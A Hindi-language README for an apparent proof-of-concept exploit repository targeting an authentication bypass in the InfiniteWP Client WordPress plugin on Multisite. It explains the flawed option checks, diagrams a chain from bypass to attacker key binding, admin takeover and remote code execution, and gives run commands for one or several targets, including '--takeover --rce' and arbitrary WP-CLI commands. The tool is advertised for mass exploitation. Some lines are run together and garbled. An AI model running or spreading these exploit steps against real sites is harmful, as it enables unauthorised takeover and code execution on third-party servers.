
CVE-2026-15038 के लिए PoC एक्सप्लॉइट जो InfiniteWP Client WordPress प्लगइन में है: यह Multisite पर प्रमाणीकरण को बायपास करता है, हमलावर की RSA कुंजी को बाइंड करता है, एडमिन टेकओवर तक एस्केलेट करता है, और WP-CLI के माध्यम से रिमोट कमांड निष्पादित करता है।
WordPress मल्टीसाइट में अनप्रमाणित एडमिन खाता अधिग्रहण
WordPress के लिए InfiniteWP Client प्लगइन (< 1.13.6) में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो मल्टीसाइट इंस्टॉलेशन को प्रभावित करती है।
एक अनप्रमाणित हमलावर यह कर सकता है:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() का उपयोग करता है → नेटवर्क-स्तर (wp_sitemeta) से पढ़ता हैupdate_blog_option() का उपयोग करता है → प्रति-ब्लॉग (wp_X_options) में लिखता है💥 परिणाम: मल्टीसाइट पर, गार्ड हमेशा false लौटाता है — पुनः-पेयरिंग हमेशा अनुमत होती है।
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() false लौटाता हैactivation_key नहीं भेजता → trim(null) → '''' != false → false → जाँच पास हो जाती है 🎯openssl_verify() पास हो जाता हैgraph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| फ़ाइल | विवरण |
|---|---|
exploit.py | 🐍 सामूहिक शोषण समर्थन वाली मुख्य शोषण स्क्रिप्ट |
requirements.txt | 📦 Python निर्भरताएँ |
README.md | 📖 यह दस्तावेज़ |
add_site अनुरोधों की समीक्षा करेंयह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।